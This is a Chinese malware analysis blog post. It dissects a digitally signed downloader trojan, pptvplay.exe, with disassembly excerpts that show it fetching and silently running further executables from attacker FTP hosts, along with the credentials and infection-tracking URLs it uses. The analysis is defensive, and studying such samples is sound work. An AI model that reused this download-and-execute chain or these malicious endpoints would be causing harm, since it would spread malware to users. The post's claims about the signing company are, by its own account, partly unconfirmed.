文件: pptvplay.exe
语言: Borland Delphi 6.0 - 7.0 [Overlay] (PEiD)
类型: TR/Downloader ; AD/HotPop
MD5 : 043CAED1C6D0F2B40284ED702A2759AE
加壳: -
大小: 96,656 字节
时间: 2010-5-24 22:07:11
本文来自sacour.cn  注:文章留待后续更新 部分争议内容有待证实 请不要转载本文。

今天发现一个数字签名为“北京飞游世纪科技有限公司”的文件,存放该文件的服务器同样使用了泛解析,具体域名暂不发出,需要文件请留言。

文件分析:
启动后程序调用GetSystemDirectoryA获取系统目录,然后获取第一个字节做为系统盘符,分别连接:\\Program Files\\Common Files、:\Program Files\Internet Explorer\iexplore.exe得到CommonFiles和Iexplore的位置(一点疑惑……作者不知道用环境变量的吗?)然后程序使用CreateProcessA打开iexplore.exe,参数(访问)为hxxp://changyou.xz26.com/gg/lunhuan/goto.html,一个广告页。然后程序调用CreateFileA建立文件,位置不确定,为Commonfiles下任意一个数字名文件夹,由其的一个函数(暂命名为GetName)生成,我调试时得到的是:
debug034:0105DA48 aCProgramFilesI db 'C:\Program Files\Common Files\3792\cniesetup.tmp'

然后程序建立一个名为KOLFTP的FTP连接:
.text:00410458 push    offset aKolftp  ; "KOLFTP"
.text:0041045D call    InternetOpenA

接着再次调用GetName函数,生成一个随机的名称,因为是泛解析的缘故,所以随便什么字符都是可以的,连上xz19.com,帐号down2,密码down2,端口21000:

debug034:0107A848 aCWindowsSystem db 'ajuzhoa.xz19.com',0,0,'2',0
call  InternetConnectA

然后程序调用FtpGetFileA来下载文件。此下载的过程暂命为FtpDwload。
mov     edx, offset aMyieCnnuoie_ex ; "/myie/CnNuoIE.exe
FtpGetFileA 本文来自sacour.cn

文件会保存到***.tmp,然后程序使用MoveFileExA将其移动(等效重命名)为.exe文件。
debug034:0105DA88 aCProgramFile_1 db 'C:\Program Files\Common Files\6894\cnNuoIEs.tmp'
 MoveFileExA
 
之后程序休眠0x1388毫秒。
 .itext:00411448 push    1388h           ; dwMilliseconds
.itext:0041144D call    Sleep

再调用WinExec启动对应程序,如
push addr  ;'"C:\Program Files\Common Files\6894\cnNuoIEs.exe" /VERYSILENT
call WinExec

FtpDwload函数结束。

之后程序还会多次调用FtpDwload函数,分别下载:/avtv/ctfmon.exe与/backup/KuoDouSetup38.exe并执行,一个是木马,一个是正常软件(推广用)。

感染统计模块:最后程序会访问 hxxp://cf.jf52.com/code/ll_count.asp?tid=4&ok= 用于统计感染信息。

访问之后程序还会有一个附加动作,帐号test,密码test,端口21连接域名test.haoye123.net下载1001.exe并执行。看样子也是调用了FtpDwload函数。

proof:

2009年此公司已为病毒做签名且动作几乎没变:http://laiba.tianya.cn/laiba/CommMsgs?cmm=18763&tid=2709003613563609968&ref=gl-topic-sub

待补充。